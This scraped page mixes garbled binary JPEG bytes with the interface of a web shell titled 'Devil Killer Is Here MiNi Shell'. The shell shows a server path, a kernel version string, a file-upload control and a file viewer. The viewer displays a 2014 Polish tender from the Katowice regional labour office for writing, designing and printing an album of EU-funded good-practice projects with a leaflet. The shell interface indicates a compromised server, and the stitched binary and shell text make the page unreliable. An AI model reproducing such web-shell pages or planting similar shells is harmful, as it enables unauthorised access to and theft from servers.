JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140401/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140401/70413-N-2014.html

<p class="kh_header"><b>Katowice: OPRACOWANIE MERYTORYCZNE, PROJEKT GRAFICZNY, SKŁAD I DRUK ALBUMU DOBRYCH PRAKTYK WRAZ Z ULOTKĄ</b><br>
<b>Numer ogłoszenia: 70413 - 2014; data zamieszczenia: 01.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy , ul. Kościuszki 30, 40-048 Katowice, woj. śląskie, tel. 0 32 757 33 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu woj.śląskiego nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE MERYTORYCZNE, PROJEKT GRAFICZNY, SKŁAD I DRUK ALBUMU DOBRYCH PRAKTYK WRAZ Z ULOTKĄ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie merytoryczne, projekt graficzny, skład i druk publikacji książkowej o charakterze promocyjno - informacyjnym wraz ulotką - albumu dobrych praktyk prezentującego projekty realizowane w ramach Programu Operacyjnego Kapitał Ludzki (PO KL) w zakresie działań wdrażanych przez Wojewódzki Urząd Pracy w Katowicach. 
1.	Cel zamówienia
2.	Odbiorcy zamówienia
3.	Zakres zamówienia
4.	Opracowanie merytoryczne albumu dobrych praktyk i ulotki
5.	Projekt graficzny 
6.	Specyfikacja techniczna  albumu dobrych praktyk i ulotki
7.	Wskazania dotyczące realizacji zamówienia
8.	Wymagania dotyczące osób zaangażowanych w realizację zamówienia
9.	Licencja 

1.	Cel zamówienia
Pokazanie rezultatów i efektów projektów zrealizowanych w ramach Programu Operacyjnego Kapitał Ludzki (PO KL) w zakresie działań wdrażanych przez Wojewódzki Urząd Pracy w Katowicach przyczyni się do:
1.1	Upowszechnienia wśród mieszkańców regionu wiedzy na temat wykorzystania środków Europejskiego Funduszu Społecznego (EFS) w ramach działań Programu Operacyjnego Kapitał Ludzki (PO KL) wdrażanych przez Wojewódzki Urząd Pracy w Katowicach w perspektywie 2007-2013;
1.2	Wykreowania wśród mieszkańców województwa śląskiego pozytywnego wizerunku EFS w zakresie działań PO KL wdrażanych przez WUP;
1.3	Podniesienia świadomości mieszkańców województwa śląskiego na temat roli EFS w rozwoju społecznym regionu w zakresie działań wdrażanych przez WUP w ramach PO KL;
1.4	Promocji Wojewódzkiego Urzędu Pracy w Katowicach jako nowoczesnej instytucji rynku pracy, która swoimi działaniami przyczynia się do realizacji celów PO KL w województwie śląskim;
1.5	Zachęcenia mieszkańców regionu oraz potencjalnych projektodawców
do wykorzystania możliwości jakie daje udział w projektach finansowanych
ze  środków EFS w kontekście nowej perspektywy na lata 2014-2020.

2.	Odbiorcy zamówienia
Mieszkańcy i osoby pracujące w województwie śląskim - potencjalni odbiorcy wsparcia EFS oraz potencjalni projektodawcy, w tym m. in.: instytucje rynku pracy, instytucje edukacyjne i szkoleniowe, jednostki samorządu terytorialnego, przedsiębiorcy, partnerzy społeczno-gospodarczy, organizacje pozarządowe, instytucje wsparcia przedsiębiorczości. 
3.	Zakres zamówienia 
3.1	Zamówienie obejmuje realizację następujących zadań:
3.1.1	Zadanie I - przygotowanie merytoryczne oraz graficzne albumu dobrych praktyk wraz z ulotką, w tym: 
a)	Przygotowanie dziennikarskie treści albumu dobrych praktyk oraz ulotki;
b)	Wykonanie projektów graficznych albumu dobrych praktyk oraz ulotki, w tym opracowanie graficzne (obróbka zdjęć i grafiki pozazdjęciowej, np. tym tabel i wykresów); Wykonawca musi dysponować zbiorami zdjęć i grafik możliwych do wykorzystania podczas projektowania publikacji oraz ulotki; dopuszcza się wykorzystanie zdjęć z prywatnych archiwów uczestników projektów oraz beneficjentów za ich zgodą (ostateczny dobór zdjęć
do akceptacji Zamawiającego na etapie opracowywania projektu publikacji);
c)	Sesja zdjęciowa na terenie woj. śląskiego z bohaterami albumu dobrych praktyk (tj. uczestnikami projektu) oraz wykonanie zdjęcia przedstawiającego Punkt Informacyjny EFS w siedzibie Wojewódzkiego Urzędu Pracy w Katowicach (zdjęcia
w rozdzielczości min. 300dpi); szczegółowe założenia dotyczące ostatecznego wykorzystania zdjęć do uzgodnienia z Zamawiającym na etapie pracy nad projektem publikacji i ulotki;
d)	Nieodpłatne przekazanie Zamawiającemu autorskich praw majątkowych (nieograniczonych czasowo ani terytorialnie) wraz
z prawami zależnymi do wszystkich tekstów zatwierdzonych przez Zamawiającego oraz elementów graficznych (zdjęć, rysunków, tabel, wykresów); 
e)	Dobór czcionki, skład, łamanie, korekta publikacji oraz ulotki; 
f)	Przekazanie Zamawiającemu w wersji elektronicznej zaprojektowanego  materiału po wprowadzeniu każdej z korekt.

3.1.2	Zadanie  II przedmiotu zamówienia będzie obejmować:
a)	dostarczenie na koszt Wykonawcy wydruku próbnego albumu dobrych praktyk wraz z ulotką (wymagany tzw. proof cyfrowy certyfikowany);
b)	druk 1200 szt. egzemplarzy publikacji oraz 1200 szt. ulotek; 
c)	dostarczenie do siedziby Zamawiającego 1200 szt. publikacji oraz 1200 szt. ulotek. Zamówienie będzie dostarczone od poniedziałku do piątku w godz. od 8.00 do 15.00 do siedziby Wojewódzkiego Urzędu Pracy w Katowicach (pokój nr 2, parter).

4.	Opracowanie merytoryczne podręcznika i ulotki 
4.1	Koncepcja merytoryczna podręcznika musi co najmniej uwzględniać:
a)	Spis treści;
b)	Wstęp ;
c)	Przykłady dobrych praktyk ukazujące max. 13 wybranych projektów zrealizowanych w ramach PO KL w woj. śląskim w perspektywie 2007-2015. Każdy projekt będzie przedstawiony poprzez wywiad z bohaterem (uczestnikiem projektu) oraz opis projektu z możliwością zawarcia komentarza osoby zaangażowanej w realizację projektu. 
d)	wyróżniające się graficznie strony zawierające statystyki dotyczące wykorzystania środków finansowych z EFS w okresie 2007-2013 np. liczby podpisanych umów, ilości osób, które korzystały ze wsparcia itp.
e)	ostateczna koncepcja zawartości merytorycznej publikacji do uzgodnienia
z Zamawiającym na etapie opracowywania treści albumu dobrych praktyk.
          4.2  Koncepcja merytoryczna ulotki musi co najmniej uwzględniać:
a)	statystyki przedstawione w ciekawej formie dotyczące np. wykorzystania środków finansowych z EFS w okresie 2007-2013, liczby podpisanych umów, ilości osób, które korzystały ze wsparcia itp. Ulotka ma stanowić tzw. kompendium sukcesu,
b)	dane teleadresowe Punktu Informacyjnego EFS WUP w Katowicach ,
c)	projekt graficzny ulotki powinien być spójny z albumem dobrych praktyk.
4.3 Pozostałe  propozycje Wykonawcy dotyczące zawartości merytorycznej  albumu oraz ulotki  do akceptacji Zamawiającego. Ostateczna koncepcja zawartości merytorycznej publikacji do uzgodnienia na etapie opracowywania treści albumu dobrych praktyk.
4.4   Zamawiający zapewni Wykonawcy materiały źródłowe dotyczące statystyk wykorzystania środków finansowych z EFS w perspektywie 2007-2013 w ramach działań wdrażanych przez WUP w Katowicach, podstawowych informacji na temat założeń i rezultatów przedstawianych projektów oraz przekaże dane kontaktowe bohaterów albumu dobrych praktyk tj. uczestników oraz osób zaangażowanych
w realizację projektów, których komentarze zostaną wykorzystane w publikacji.

5.	Projekt graficzny podręcznika wraz z ulotką
5.1	 Projekt graficzny albumu dobrych praktyk oraz ulotki musi uwzględniać:
a)	logotypy Programu Operacyjnego Kapitał Ludzki, WUP, Śląskie 
- pozytywna energia, flagi UE z podpisem Unia Europejska Europejski Fundusz Społeczny, informacją o współfinansowaniu przez Unię Europejską ze środków Europejskiego Funduszu Społecznego, adresem strony internetowej http:efs.wup-katowice.pl, do uzgodnienia na etapie projektowania z Zamawiającym, zastosowane zgodnie z dokumentem Wytyczne dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
b)	wspólną wizualizację graficzną albumu i  ulotki,
c)	fotografie bohaterów albumu (tj. uczestników projektu) wykonane przez Wykonawcę podczas sesji zdjęciowej na terenie woj. śląskiego (zarówno
w terenie jak i w plenerze) w terminie i miejscu uzgodnionym z osobami reprezentującym poszczególne projekty oraz z Zamawiającym;
d)	zdjęcia i grafiki będące w dyspozycji Wykonawcy możliwe do wykorzystania podczas projektowania publikacji oraz ulotki; dopuszcza się również wykorzystanie zdjęć z prywatnych archiwów uczestników projektów oraz beneficjentów za ich zgodą (ostateczny dobór zdjęć do akceptacji Zamawiającego na etapie opracowywania projektu publikacji);
e)	Wykonawca przekaże Zamawiającemu do akceptacji po trzy propozycje projektów graficznych albumu dobrych praktyk oraz ulotki.

6.	Specyfikacja techniczna albumu dobrych praktyk i ulotki 
6.1. Album dobrych praktyk będzie mieć następujące parametry:
a) format: 210x210mm; 
b) objętość wraz z okładką : minimum 60 maksimum 80 stron
c) łączny nakład: 1200szt.;
d)kolorystyka: CMYK
e) rodzaj, kolor okładki: oprawa twarda kaszerowana, szyto-klejona, tłoczenia na zewnętrznej stronie okładki (logotypy, max. 30% powierzchni okładki), kolor 4+0, uszlachetniona folią błyszczącą;
f) rodzaj, gramatura, kolor wnętrza: kreda mat, 150g/m3, kolor 4+4, lakier offsetowy błysk na całości;
6.2 Wykonawca zapewni numer Międzynarodowy znormalizowany numer książki ISBN dla albumu dobrych praktyk. 
6.3. Ulotka będzie mieć następujące parametry: 
Nakład: 1200 sztuk, A-4 składane do DL w C  (297x210), kolor 4+4, druk dwustronny, papier kreda mat 135gm3, z falcowaniem, kolorystyka CMYK.
6.4. Opakowanie materiałów:
Album dobrych praktyk oraz ulotka zostanie dostarczony w opakowaniach kartonowych.

7.	Wskazania dotyczące realizacji zamówienia
7.1	W terminie 3 dni roboczych od dni zawarcia umowy, Zamawiający przekaże Wykonawcy:
a)	 kontakty telefoniczne i mailowe do bohaterów albumu dobrych praktyk, 
b)	Pozostałe materiały źródłowe wymienione w pkt. 4.4,
c)	informacje dotyczące systemu identyfikacji wizualnej dla Programu Operacyjnego Kapitał Ludzki oraz logotyp Wojewódzkiego Urzędu Pracy w Katowicach.
7.2	W terminie do 5 dni roboczych od dnia przekazania materiałów, o których mowa w pkt. 7.1, Wykonawca przekaże Zamawiającemu do akceptacji koncepcję dotyczącą propozycji tytułów rozdziałów albumu wraz z opisem ich zawartości  oraz propozycji zawartości merytorycznej ulotki. W terminie 5 dni roboczych Zamawiający akceptuje koncepcję albo zgłasza uwagi. W przypadku braku akceptacji bądź zgłoszenia uwag, Wykonawca przestawi nową lub poprawioną koncepcję w terminie 3 dni roboczych od dnia zgłoszenia uwag przez Zamawiającego. Wykonawca opracuje kolejne koncepcje, aż do uzyskania pisemnej akceptacji Zamawiającego. 
7.3	W terminie do 10 dni roboczych od dnia przekazania materiałów, o których mowa w pkt. 7.1, Wykonawca przekaże Zamawiającemu do akceptacji po trzy propozycje projektów graficznych albumu dobrych praktyk oraz ulotki.W terminie 4 dni roboczych Zamawiający akceptuje wybrany projekt materiałów albo zgłasza uwagi.
7.4	W przypadku braku akceptacji któregokolwiek z projektów bądź zgłoszenia uwag, Wykonawca przestawi nowy lub poprawiony projekt w terminie 3 dni od dnia zgłoszenia uwag. Wykonawca opracuje, uwzględniając uwagi i sugestie Zamawiającego - kolejne propozycje, aż do uzyskania pisemnej zgody Zamawiającego. 
7.5	Niezwłocznie po ustaleniu koncepcji zawartości merytorycznej albumu i ulotki
o której mowa w pkt. 7.2 , Wykonawca rozpocznie prace dziennikarskie nad zawartością merytoryczną albumu i ulotki. Teksty będą nadsyłane systematycznie, przy czym ostatni tekst musi zostać przesłany do akceptacji w terminie 21 dni roboczych od dnia akceptacji koncepcji, o której mowa w pkt. 7.2. Wszystkie teksty będą zatwierdzane przez Zamawiającego
do 4 dni roboczych, w przypadku braku akceptacji któregokolwiek z tekstów, 
w terminie 4 dni roboczych od dnia zgłoszenia uwag, Wykonawca opracuje, uwzględniając uwagi i sugestie Zamawiającego - kolejne propozycje, aż do uzyskania pisemnej zgody Zamawiającego.  
7.6	Wykonawca przedstawi Zamawiającemu do akceptacji złożony i zweryfikowany pod względem merytorycznym i graficznym album wraz ulotką, maksymalnie do 4 dni roboczych od dnia akceptacji ostatniego tekstu.
7.7	Jeśli Zamawiający nie zgłosi uwag do przesłanego materiału, o którym mowa 
w pkt. 7.6, w terminie 7 dni roboczych od dnia uzyskania przez Wykonawcę informacji o braku uwag, Wykonawca dostarczy do siedziby Zamawiającego wydruk próbny materiału (tzw. proof cyfrowy certyfikowany uwzględniający fragmenty okładki, wybranych 4 stron albumu dobrych praktyk oraz fragment ulotki ). 
7.8	Przed wykonaniem wydruku 1200 szt. egz. albumu i ulotki, druk próbny materiału musi zostać zaakceptowany przez Zamawiającego w terminie 4 dni roboczych od dnia przekazania wydruku próbnego. Zamawiający akceptuje go albo zgłasza uwagi Wykonawcy do 4 dni roboczych. W przypadku braku akceptacji, Wykonawca prześle kolejny wydruk próbny.
7.9	Ostateczny termin dostarczenia albumu dobrych praktyk wraz z ulotkami to
31 lipca 2014 r. 
7.10	Wszystkie teksty do albumu i ulotki muszą zostać sprawdzone 
pod kątem poprawności merytorycznej. Wykonawca odpowiada za błędy merytoryczne zawarte w albumie i ulotce i zobowiązuje się do usunięcia wszelkich błędów merytorycznych,  które nie wynikły z winy Zamawiającego na własny koszt.
7.11	Wszelkie uwagi, sugestie i akceptacje zgłaszane są drogą elektroniczną, 
za wyjątkiem końcowego protokołu odbioru, który będzie podpisany odręcznie przez Zamawiającego i Wykonawcę. Przygotowanie protokołu leży po stronie Wykonawcy. 
7.12	Wraz z protokołem odbioru Wykonawca przekaże Zamawiającemu w oryginale dokumentację realizacji usługi dotyczącą wyrażenia przez bohaterów albumu dobrych praktyk zgody na publikację wizerunku, posługiwanie się danymi osobowymi oraz autoryzacje wywiadów i pozostałych wypowiedzi wykorzystanych w publikacji. Dokumentacja musi być oznaczona zgodnie z dokumentem Wytyczne dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki (wzory do akceptacji Zamawiającego).
7.13	Wykonawca odpowiada za błędy literowe, układ i jakość drukowanych zdjęć, błędne podpisy pod zdjęciami, które pojawią się w albumie oraz na ulotce. Wykonawca zobowiązuje się do usunięcia wszelkich wad druku, które nie wynikły z winy Zamawiającego na własny koszt.

8.	Licencja na korzystanie z fotografii, grafik, tekstów 
8.1	Po stronie Wykonawcy jest nabycie wszelkich praw majątkowych związanych z wykorzystywanymi w albumie dobrych praktyk oraz ulotce elementami graficznymi, w tym z wizerunkami fotografowanych osób.  Wykonawca zapewni we własnym zakresie zgodę na posługiwanie się danymi osobowymi, wizerunkiem, autoryzację wywiadów oraz wypowiedzi bohaterów albumu dobrych praktyk  użytych w publikacji.
8.2	Wykonawca wraz z podpisaniem umowy, zobowiązuje się do przeniesienia autorskich praw majątkowych do materiałów wytworzonych w ramach usługi, w tym przekazuje Zamawiającemu prawa autorskie do nieograniczonego dysponowania użytymi w materiałach (albumie dobrych praktyk oraz ulotce) formami graficznymi (layoutami) oraz do fotografii i tekstów, udzielając tym samym bezterminowej licencji do ich wykorzystania na wszystkich polach eksploatacji bez ograniczeń czasowych 
i terytorialnych. 
8.3	Wykonawca odpowiada za wszelkie roszczenia osób trzecich dotyczące praw majątkowych do materiałów wytworzonych w ramach usługi..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.82.25.00-7, 79.82.30.00-9, 92.31.22.10-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> ZAMAWIAJĄCY NIE PRZEWIDUJE  WNIESIENIA WADIUM</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww warunku, jeżeli Wykonawca wykaże, iż dysponuje :

- 1 osobą proponowaną jako kierownik projektu - posiadającą doświadczenie tj. w okresie ostatnich 3 lat przed upływem terminu składania ofert
 kierowała co najmniej 2 usługami, w skład których wchodziło opracowanie merytoryczne i graficzne publikacji opatrzonych numerem ISBN LUB ISSN;
       Uwaga: zamawiający za publikację nie uznaje ulotek reklamowych

- 1 osobą proponowaną jako grafik - posiadającą doświadczenie w projektowaniu graficznym, tj. w okresie ostatnich 3 lat przed upływem terminu składania ofert wykonała projekt graficzny min. 2 publikacji opatrzonych numerem ISBN LUB ISSN;
                                            Uwaga: zamawiający za publikację nie uznaje ulotek reklamowych

- 1 osobą proponowaną jako redaktor  - posiadającą doświadczenie 
w zakresie opracowywania merytorycznego tekstów, tj. w okresie ostatnich 3 lat przed upływem terminu składania ofert opracowała min. 15 tekstów, które zostały wydane w publikacjach posiadających numer ISBN lub ISSN.
Uwaga: Zamawiający za tekst uznaje publikację o minimalnej liczbie znaków w liczbie 3 tys. (ze spacjami) 

- 1 osobą proponowaną jako fotograf - posiadająca doświadczenie w zakresie wykonywania profesjonalnej fotografii studyjnej ilub plenerowej, 
tj. w okresie ostatnich 3 lat przed upływem terminu składania ofert zrealizowała min. 2 zlecenia fotograficzne w ramach współpracy z wydawnictwem lub agencją lub pośrednictwem w obrocie zdjęciami lub innym profesjonalnym pośrednikiem w obrocie zdjęciami.

Opis sposobu dokonywania oceny spełnienia tego warunku:
	Zamawiający dokona oceny spełnienia ww warunku według formuły spełnia,nie spełnia na podstawie załączonego do oferty wykazu zawierającego imię i nazwisko osób, które będą uczestniczyć w realizacji zamówienia jako: kierownik projektu, grafik, redaktor oraz fotograf wraz z informacjami na temat ich doświadczenia zawodowego niezbędnego do wykonania zamówienia, nazwą  oraz datą publikacji wraz z numerem ISBN lub ISSN jak również  informacją o podstawie do dysponowania tymi osobami.


Nie wykazanie spełnienia ww warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.

Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, w sytuacjach, w których uprawnienie do występowania w imieniu Wykonawcy nie wynika z przedłożonego dokumentu wyszczególnionego w punkcie III.4.2) pkt 2. W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:wup.katowice.ibip.pl<br>
